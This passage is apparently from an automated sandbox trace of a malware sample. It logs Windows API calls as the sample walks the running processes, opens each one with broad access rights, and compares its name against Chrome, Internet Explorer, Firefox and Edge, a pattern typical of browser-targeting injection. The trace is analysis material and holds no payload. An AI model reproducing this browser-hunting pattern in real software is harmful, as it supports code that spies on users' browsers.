	[0245.464] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x92d0
	[0245.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.464] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.465] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.465] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.465] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.466] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.466] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.468] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x92d4
	[0245.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.468] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.468] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.468] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.469] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.469] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x92d8
	[0245.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.470] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.470] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.471] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.471] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.471] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0245.472] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x92dc
	[0245.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.472] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0245.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.472] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.473] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0245.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.473] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.473] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.474] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x92e0
	[0245.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.474] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.474] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.475] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.475] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.475] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.476] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x92e4
	[0245.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.476] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.476] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.477] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.477] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.477] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0245.478] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x92e8
	[0245.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.478] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0245.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.478] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.478] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0245.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.479] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.479] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0245.480] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x92ec
	[0245.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.480] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.480] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.480] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.481] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.481] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0245.482] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x92f0
	[0245.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.482] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0245.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.484] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.485] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0245.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.485] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.485] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.486] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x92f4
	[0245.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.486] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.486] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.487] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.487] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.487] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0245.488] CloseHandle (hObject=0x4fd0) returned 1
	[0245.488] Sleep (dwMilliseconds=0x64) 
	[0245.593] GetCurrentProcessId () returned 0x110
	[0245.593] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0245.597] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0245.598] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0245.600] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0245.601] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x92f8
	[0245.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.601] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0245.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.602] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.602] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0245.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.603] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.603] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0245.605] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x92fc
	[0245.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.605] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0245.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.606] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.606] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0245.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.606] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.606] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0245.607] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x9300
	[0245.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.607] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0245.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.608] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.608] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0245.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.608] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.609] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0245.609] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x9304
	[0245.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.609] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0245.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.610] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.610] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0245.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.610] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.610] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0245.611] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x9308
	[0245.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.611] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0245.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.612] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.612] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0245.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.612] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.613] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0245.613] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x930c
	[0245.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.613] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0245.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.614] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.614] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0245.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.614] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.615] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0245.615] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x9310
	[0245.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.615] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0245.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.616] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.616] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0245.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.616] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.616] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0245.617] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x9314
	[0245.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.617] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0245.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.618] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.618] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0245.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.618] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.618] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.619] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x9318
	[0245.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.619] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.619] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.620] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.620] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.620] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.621] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x931c
	[0245.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.621] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.621] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.622] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.622] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.622] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.623] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x9320
	[0245.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.623] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.624] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.624] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.624] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.625] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.625] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x9324
	[0245.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.625] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.626] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.626] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.626] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.627] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.627] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x9328
	[0245.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.628] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.628] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.628] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.629] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.629] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.629] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x932c
	[0245.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.630] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.630] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.630] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
